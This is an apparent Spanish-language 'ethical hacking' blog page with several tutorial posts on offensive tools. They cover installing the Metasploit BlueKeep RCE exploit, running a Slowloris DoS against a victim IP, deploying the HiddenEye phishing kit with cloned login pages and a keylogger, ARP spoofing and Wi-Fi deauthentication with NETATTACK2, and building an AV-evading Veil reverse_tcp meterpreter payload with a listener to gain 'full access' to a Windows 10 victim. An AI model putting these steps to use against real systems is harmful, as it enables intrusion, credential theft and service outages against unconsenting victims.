Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

Mostrando entradas con la etiqueta computación. Mostrar todas las entradas
Mostrando entradas con la etiqueta computación. Mostrar todas las entradas

miércoles, 23 de octubre de 2019

BLUEKEEP CVE-2019-0708 INSTALACIÓN Y USO


BlueKeep CVE-2019-0708


Metasploit lanzo hace días en un módulo de explotación pública inicial para CVE-2019-0708 , también conocido como BlueKeep, como una solicitud de extracción en Metasploit Framework. El módulo de explotación se dirige a las versiones de 64 bits de Windows 7 y Windows 2008 R2. El módulo se basa en el código de prueba de concepto de Metasploit contributor @ zerosum0x0 , quien también contribuyó con el módulo de escáner BlueKeep de Metasploit y los módulos de escáner y exploit para EternalBlue . El exploit de Metasploit utiliza una biblioteca mejorada de protocolos RDP de propósito general , así como capacidades mejoradas de huellas dactilares RDP, los cuales beneficiarán a los usuarios y contribuyentes de Metasploit mucho más allá del contexto del escaneo y la explotación de BlueKeep.
Como proyecto de código abierto, uno de los principios rectores de Metasploit es que el conocimiento es más poderoso cuando se comparte. El acceso democrático a las capacidades de los atacantes, incluidos los exploits, es fundamental para los defensores, especialmente aquellos que confían en herramientas de código abierto para comprender y mitigar el riesgo de manera efectiva.
Actualmente solo funciona en modo “manual”, lo que significa que necesita la interacción del usuario para ejecutarse correctamente.


INSTALACIÓN

Para agregar el exploit a Metasploit he usado y probado de dos maneras las cuales les detallare a continuación.

PRIMER MÉTODO

Antes de empezar asegurate de tener metasploit y tu Kali Actualizado.
Clonamos el repositorio que se encuentra en GitHub movemos los archivos a las siguientes carpetas. otra opción es descargarlos desde acá Link.

El archivo rdp.rb lo movemos a la siguiente ruta.
cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb    

El archivo rdp_scanner.rb lo movemos a la siguiente ruta.
cp./rdp_scanner.rb/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

El archivo cve_2019_0708_bluekeep.rb lo movemos a la siguiente ruta.
cp./cve_2019_0708_bluekeep.rb/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

El archivo cve_2019_0708_bluekeep_rce.rb lo movemos a la siguiente ruta.
cp./cve_2019_0708_bluekeep_rce.rb/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Abrimos Metasploit y ejecutamos el siguiente comando y ya tendríamos el modulo y sus componentes instalado.

msf5> reload_all

SEGUNDO MÉTODO

Clonamos el repositorio de metasploit y abrimos la carpeta.
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework

Luego ejecutamos los siguientes comando para la configuración de dicho módulo.
git fetch origin pull/12283/head:bluekeep
git checkout bluekeep

Instalamos las dependencias necesarias.
gem install bundler && bundle

Si en el transcurso de la instalacion o configuracion sale error lo solucionamos con los siguientes comandos.
apt-get install libpq-dev
apt-get install libpcap-dev

ya con esto tendríamos instalado y configurado Metasploit y el módulo BlueKeep.

Nota: Si faltase alguna dependencia o herramienta extra instalarla manualmente.






 Video explotacion a sistema Windows 7  x64 


sábado, 3 de agosto de 2019

KAGE INTERFAZ GRÁFICA PARA METASPLOIT



KAGE INTERFAZ GRÁFICA PARA METASPLOIT 
Kage (ka-geh) es una herramienta inspirada en AhMyth diseñada para Metasploit RPC Server para interactuar con las sesiones de meterpreter y generar cargas útiles. 

COMO INSTALARLO 
 ejecutar lo siguiente:
apt-get install –y nodejs

apt-get install libgconf-2-4

apt-get install npm

Download source code
npm install


npm run dev
cuando se termine de instalar y configurar todo no saldrá esta pantalla,ot activamos la base de datos en el botón azul 
Luego se configurar todo para su uso 

genera el nombre usuario, la contraseña (es aleatoriamente)

y ya tendremos la interfaz para usar.



martes, 12 de febrero de 2019

Slowloris Ataque Dos

Ataque Dos con Slowloris 


Que es Slowloris

Slowloris está diseñado para que una sola máquina (probablemente un Linux / UNIX desde que parece que Windows limita el número de sockets que puede tener abiertos en cualquier momento dado) puede atar fácilmente un servidor web típico o un servidor proxy al bloquear todos sus hilos mientras esperan pacientemente por más datos. Algunos servidores pueden tener una tolerancia más pequeña para los tiempos de espera que otros, pero Slowloris puede compensar eso personalizando los tiempos de espera. Hay una Función agregada para ayudarlo a comenzar a encontrar el tamaño correcto, tiempos de espera también.
Slowloris es un tipo de ataque DDoS. Slowloris es claramente diferente de los demás en que esta herramienta no es un TCP DoS; más bien, utiliza el tráfico HTTP perfectamente legítimo. Realiza una conexión TCP completa y, a continuación, solo requiere unos pocos cientos de solicitudes a largo plazo y en intervalos regulares. Como resultado, la herramienta no necesita enviar mucho tráfico para agotar las conexiones disponibles en un servidor. Eventualmente, todas las conexiones se agotarán y ningún otro servidor podrá conectarse hasta que al menos algunas de las conexiones retenidas se liberen. Esto hace posible que los hackers con recursos de tráfico limitados puedan montar un ataque con éxito.

Como Instalarlo:

Requerimientos
sudo apt-get update 
sudo apt-get install perl
sudo apt-get install libwww-mechanize-shell-perl
sudo apt-get install perl-mechanize

Ejecutarlo
Descargar slowloris.pl  Descargar
Abrir una terminal
./slowloris.pl
perl slowloris.pl -dns (Victim URL or IP) –options

Como usarlo:
ejemplo

perl ./slowloris.pl -dns - 192.168.1.2 - port 80




domingo, 20 de enero de 2019

HiddenEye Modern phishing tool



HiddenEye Modern phishing tool


Características:

1) ATAQUE VIVO Ahora tendrá información en vivo sobre las víctimas, tales como: DIRECCIÓN IP, Geolocalización, ISP, País y muchos más.

2) COMPATIBILIDAD Todos los sitios son compatibles con móviles.

3) KEYLOGGER Ahora también tendrá la capacidad de capturar todos los keystokes de la víctima. ** (ACTUALMENTE): - Esta función se agrega en la página web de instagram y github, para reducir la posibilidad de un funcionamiento lento del enlace generado.
** ¿CÓMO AÑADIRLO MANUALMENTE? - Puede agregar esto manualmente colocando los códigos en la página de índice (ponga estos códigos en cualquier lugar dentro de la página de índice // pero no entre ningún otro código de script)

<script src="keylogger.js"></script>


Probado en: 
  • Kali Linux - Edición Rolling
  • Parrot OS - Edición móvil
  • Linux Mint - 18.3 Sylvia
  • Ubuntu - 16.04.3 LTS
  • MacOS High Sierra
  • Arch Linux
  • Manjaro XFCE Edición 17.1.12
  • Arco negro
  • TERMUX (para usuarios de Android)
Páginas Disponibles
Facebook:
Página de inicio de sesión de Facebook tradicional.
Método de encuesta avanzada.
Inicio de sesión de seguridad falso con la página de Facebook.
Página de inicio de sesión de Facebook Messenger.

Google:
Página de inicio de sesión de Google tradicional.
Método de encuesta avanzada.

LinkedIn:
Página de inicio de sesión de LinkedIn tradicional.

Github:
Página de inicio de sesión de Github tradicional.

Stackoverflow:
Página de inicio de sesión de Stackoverflow tradicional.

Wordpress:
Página de inicio de sesión de Wordpress similar.

Twitter:
Página de inicio de sesión de Twitter tradicional.

Instagram: 
Página de inicio de sesión de Instagram tradicional.
Instagram Autoliker Phishing Page.
Perfil de Instagram Escenario Ataque avanzado.


Nuevas Páginas

PHISHING DE FACEBOOK:
Página de inicio de sesión de Facebook tradicional.
Método de encuesta avanzada.
Inicio de sesión de seguridad falso con la página de Facebook.
Página de inicio de sesión de Facebook Messenger.

INSTAGRAM PHISHING: 
Página de inicio de sesión tradicional
Página de autoliker falso instagram
Perfil de Instagram Escenario Ataque avanzado.

PHISHING SNAPCHAT: 
Página de inicio de sesión de Snapchat tradicional

YAHOO PHISHING: 
Página de inicio de sesión de Yahoo tradicional

TWITCH PHISHING:
Página de inicio de sesión de Twitch tradicional [Inicio de sesión con Facebook también disponible]

MICROSOFT PHISHING:
Página de inicio de sesión tradicional de Microsoft-Live Web

STEAM PHISHING: 
Página de inicio de sesión tradicional de Steam

VK PHISHING: 
Página de inicio de sesión en VK tradicional
Método de encuesta avanzado

ICLOUD PHISHING: 
Página de inicio de sesión web de iCloud tradicional

Instalación
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
cd HiddenEye
sudo apt install python3-pip
sudo pip3 install -r requirements.txt
chmod 777 HiddenEye.py
python3 HiddenEye.py






lunes, 1 de enero de 2018

NETATTACK2 (Escaneando y Atacando Redes)

NETATTACK2


Que es ?

NETATTACK2 es un script escrito en python que puede escanear y atacar redes. Está basado en GUI que lo hace fácil de entender.

Que hace ?


EXPLORACIÓN
Escanee su red en busca de hosts activos, su sistema operativo, puertos abiertos y mucho más.
Busque puntos de acceso y descubra el tipo de encriptación, WPS y otros datos útiles.

SPOOFING / SNIFFING
Simple ARP Spoofing
DNS Sniffing by ARP Spoofing el objetivo y escuchando DNS-Queries

SACAR
Patear hosts de su internet usando ARP-Spoof attack

DEAUTHING
Enviar paquetes de desauthentication a puntos de acceso en su área (DoS)
Deauth-All, básicamente hace lo mismo pero escanea redes y las ataca periódicamente

INSTALACIÓN
Lo primero es clonar el repositorio lo hacemos de la siguiente manera:  Netattack2 abrimos una nueva terminal y tecleamos los siguiente git clone https://github.com/chrizator/netattack2.git


Luego entramos a la carpeta y le damos permisos de la siguiente forma chmod +x  netattack2.py
  


Quedará de la siguiente forma cuando ya no tenga el color verde  ya tiene los permisos es decir podemos ejecutarlo.


Lo iniciaremos de la siguiente forma ./netattack2.py y nos dirá que si queremos instalar todos los requerimientos le decimos que si.




Esperamos hasta que descargue todos los complementos necesarios para poder ejecutar sin problemas la herramienta, cuando ya termine todo hacemos nuevamente esto: ./netattack2.py  y ya podemos usar la herramienta.


Nota: si les da problemas cuando estén instalando los complementos, en una ventana nueva  teclear lo siguiente y con esto ya corregirán error y vuelven a ejecutar sin problema la herramienta. apt --fix-broken install




Feliz Año


lunes, 18 de enero de 2016

INSTALAR VEIL EVASION EN KALI LINUX 2.0

INSTALAR VEIL EVASION EN KALI LINUX 2.0 


Te enseñare de una forma raída y sencilla como instalar esta poderosa herramienta, comencemos 


actualizamos los repositorios con este comando 

 apt-get update

luego procedemos a instalar veil con el siguiente comando 

apt-get install veil

si de esta forma no nos deja instalarlo lo clonamos de la siguiente forma 

git clone https://github.com/Veil-Framework/Veil-Evasion

luego de esto procedemos a ejecutar el setup.sh de la siguiente forma en mi caso la ruta es la siguiente
.
cd /root/Veil-Evasion/setup/setup.sh

pedirá que instalemos python, pywin, pycrypto lo cual aremos lo típico siguiente siguiente e instalar. 

Esperaremos a que termine de instalar y aremos los siguiente. ejecutamos veil de la siguiente forma, tenemos que estar en el directorio o la carpeta de veil. 

./veil-evasion.py

y por ultimo tendremos esto:



espero que te sea útil este post.






viernes, 15 de enero de 2016

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT KALI LINUX 2.0

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT


En la actualidad los sistemas operativos se han actualizado y han tendido demasiado auge entre los usuarios, Windows ha actualizado su sistema operativo y con ello los millones de usuarios que ya lo están usando, ha tenido pros y contras.

Sabiendo que no todos los sistemas son seguros, Windows no es la excepción, bueno como lo dice el título acá te enseñare cómo hacerlo paso a paso, así que comencemos.

Lo primero que tenemos que haces es irnos a la terminal y colocar lo siguiente tenemos que tener instalado Veil-Evasion buscamos la ruta donde lo tenemos instaldo en mi caso seria cd /usr/share/veil-evasion luego lo ejecutamos con este código  ./Veil-Evasion.py


nos llevara a esta pantalla 


luego con el comando use escogemos el payload a usar nos arrojara un listado de payloads disponibles en  este caso escogeré el 5 c/meterpreter/rev_tcp  


nos queda de esta forma 


configuramos nuestro LHOST Y LPORT seria de la siguiente forma  set LHOST  y tu ip y set LPORT y el puerto que quedara en escucha


luego con el comando generate  crearemos el payload nos pedirá que le coloquemos un nombre al payload en mi caso le colocare aplicación esperamos u momento y nos dará la ruta donde se encuentra  seria /var/lib/veil-evasion/output/compiled  y allí estará el .exe


quedara así 


luego ejecutamos metasploit configuraremos los siguiente
use multi/handler
usaremos este payload
set payload Windows/meterpreter/reverse_tcp
configuramos la ip y el Puerto de la siguiente forma
set Lhost y la ip que pusimos anteriormente
set Lport y el puerto que pusimos anteriormente
y de ultimo exploit
nos quedara todo de la siguiente forma


al momento que la victima ejecute el archivo, tendremos una sesión de meterpreter abierta 


obtendremos acceso total a la maquina





espero que te sea útil y te allá gustado. 



"EL MEJOR SISTEMA OPERATIVO EL CEREBRO "